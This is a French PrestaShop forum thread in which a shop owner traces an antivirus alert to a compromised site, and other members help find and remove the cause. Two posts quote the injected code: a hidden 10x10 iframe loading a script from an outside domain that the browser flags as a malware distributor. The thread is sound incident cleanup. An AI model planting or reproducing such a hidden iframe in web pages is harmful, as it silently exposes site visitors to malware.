jdo-cecile Posted January 24, 2012 Share Posted January 24, 2012 j'ai regardé tous les scripts, j'ai pas trouvé de bout de code bizarre de plus, quand j'ai voulu importé ma partie admin en locale, j'ai mon antivirus qui s'est déclenché pour le meme cheval de troie Si quelqu'un pouvait me donner un coup de main, ce serait super !!! Link to comment Share on other sites More sharing options...
Carl Favre Posted January 24, 2012 Author Share Posted January 24, 2012 Sur quels fichiers as-tu eu l'alerte ? Vérifie bien tous les fichiers de ton thème, j'ai vu en début de ton thème le code suivant qui n'a rien à y faire : <iframe src="http://novikkoll.in/in.cgi?default" width="10" height="10" style="visibility:hidden;position:absolute;left:0;top:0;"></iframe> Link to comment Share on other sites More sharing options...
coeos.pro Posted January 24, 2012 Share Posted January 24, 2012 bien vu, une iframe avec visibility:hidden : suspect en vue ! Avec chrome j'ai une page d'avertissement qui m'empèche d'aller sur le site avec comme message : www.ronde-des-bijoux.com fournit du contenu provenant de novikkoll.in, un site connu pour distribuer des logiciels malveillants. Votre ordinateur pourrait être infecté par un virus si vous consultez ce site. Link to comment Share on other sites More sharing options...
jdo-cecile Posted January 24, 2012 Share Posted January 24, 2012 ok je verifie ca tout de suite Merci Link to comment Share on other sites More sharing options...
coeos.pro Posted January 24, 2012 Share Posted January 24, 2012 Sur quels fichiers as-tu eu l'alerte ? Vérifie bien tous les fichiers de ton thème, j'ai vu en début de ton thème le code suivant qui n'a rien à y faire : <iframe src="http://novikkoll.in/in.cgi?default" width="10" height="10" style="visibility:hidden;position:absolute;left:0;top:0;"></iframe> Ceci provient certainement d'un module "vérolé", il faudrait avoir la liste des module installés dans les hooks "top of pages" et aussi dans "header of pages", tu trouvera cette liste dans ton back office : modules>positions Link to comment Share on other sites More sharing options...
jdo-cecile Posted January 24, 2012 Share Posted January 24, 2012 sur un fichier comme admin*/index.php, admin/login.php et index.php a la racine du site Link to comment Share on other sites More sharing options...
jdo-cecile Posted January 24, 2012 Share Posted January 24, 2012 je viens de m'appercevoir que j'ai cet iframe meme dans la partie admin ! je n'arrive pas a le trouver. Link to comment Share on other sites More sharing options...
coeos.pro Posted January 24, 2012 Share Posted January 24, 2012 1- il nous faut la liste des module installés dans les hooks "top of pages" et aussi dans "header of pages", tu trouvera cette liste dans ton back office : modules>positions 2- sinon c'est dans le thème : par exemple le fichier www.ronde-des-bijoux.com/themes/LE_NOM_DE_TON_THEME/header.tpl Link to comment Share on other sites More sharing options...
jdo-cecile Posted January 24, 2012 Share Posted January 24, 2012 dans mon "top of pages" il y a : - bloc informations client - pages introuvables - mots clés et dans mon "header of pages" : - url canonique - bloc recherche rapide - atos j'ai déja vérifié ces modules et je n'ai rien trouvé. Je refais un tour du coté des *.js Link to comment Share on other sites More sharing options...
jdo-cecile Posted January 24, 2012 Share Posted January 24, 2012 Je pense que j'ai trouvé c'etait dans mes index.php et login.php, j'ai renvoye un code source qui etait propre et je ne vois plus apparaitre le fameux iframe. Est ce que quelqu'un peu vérifier SVP, en tout cas merci d'avance pour l'aide que vous m'avez apporté et les idées de recherches. Link to comment Share on other sites More sharing options...
Carl Favre Posted January 24, 2012 Author Share Posted January 24, 2012 Ça me semble bon, plus d'alerte dans Chrome ni IE. Link to comment Share on other sites More sharing options...
coeos.pro Posted January 24, 2012 Share Posted January 24, 2012 c'est bon je n'ai plus le message d'avertissement, j'ai fait différentes page (accueil, catégorie, produit, connexion) Link to comment Share on other sites More sharing options...
jdo-cecile Posted January 24, 2012 Share Posted January 24, 2012 ouf, quelle saleté ce truc, surtout que début d'année j'ai eu un autre cheval de troie sur mon pc qui est dead depuis; une grosse vérole et perdu un bon paquet de truc !!! Link to comment Share on other sites More sharing options...
Amazonya Posted June 24, 2012 Share Posted June 24, 2012 Ou trouve ton ce patch, car il n'est plus disponible, je tombe sur une page 404 ?? Link to comment Share on other sites More sharing options...
Johann Posted June 24, 2012 Share Posted June 24, 2012 j'avais conservé le herfix ici : www.johanncorbel.fr/download/prestashop/versions/herfix.zip Link to comment Share on other sites More sharing options...
Amazonya Posted June 25, 2012 Share Posted June 25, 2012 Merci Johann, mais comment identifier si la modif a déja été validée ? ( reprise d'une boutique. Link to comment Share on other sites More sharing options...
Amazonya Posted June 26, 2012 Share Posted June 26, 2012 Un détournement d’un script de mise à jour d’actualité on ne sait pas ou et un correctif indisponible sur le site Prestashop bravo l'équipe heureusement que quelques actifs sympas sont la Link to comment Share on other sites More sharing options...
amerigeau Posted July 17 Share Posted July 17 Bonjour à tous, Pour aider le maximum de marchands sous PrestaShop, voici un article compilant le maximum de données sur le sujet "comment sécuriser une boutique PrestaShop" et "comment réparer une boutique PrestaShop piratée" : https://www.arnaud-merigeau.fr/comment-securiser-votre-boutique-prestashop/ Bonne lecture ;) Link to comment Share on other sites More sharing options...
Recommended Posts